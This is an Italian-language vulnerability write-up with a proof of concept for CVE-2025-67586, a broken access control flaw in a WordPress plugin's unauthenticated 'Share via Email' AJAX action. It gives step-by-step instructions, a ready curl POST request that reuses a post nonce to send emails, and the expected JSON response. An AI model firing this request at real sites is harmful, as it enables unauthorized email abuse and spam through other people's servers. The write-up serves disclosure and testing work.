
writeup per (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)
Writeup per (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)
-------------- CVE-2025-67586 Exploit PoC --------------
==> Descrizione Esiste una vulnerabilità di broken access control in un plugin WordPress sviluppato da DLX Plugins. Il plugin espone un'azione AJAX non autenticata che consente agli attaccanti di abusare della funzionalità "Share via Email" senza adeguati controlli di autorizzazione.
Un attaccante non autenticato può riutilizzare un nonce valido del post per attivare richieste di condivisione via email, portando all'invio di email non autorizzate (spam / abuso email) senza autenticazione dell'utente.
==> Privilegi richiesti Nessuno (Non autenticato)
==> Prova di concetto (PoC)
Step 1: Scegli un sito con il plugin installato
Step 2: Ottieni un nonce valido
Step 3: Exploit tramite richiesta non autenticata
comando bash: (sostituisci URL del sito, URL del post e nonce)
curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed
--> Risposta JSON attesa:
{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }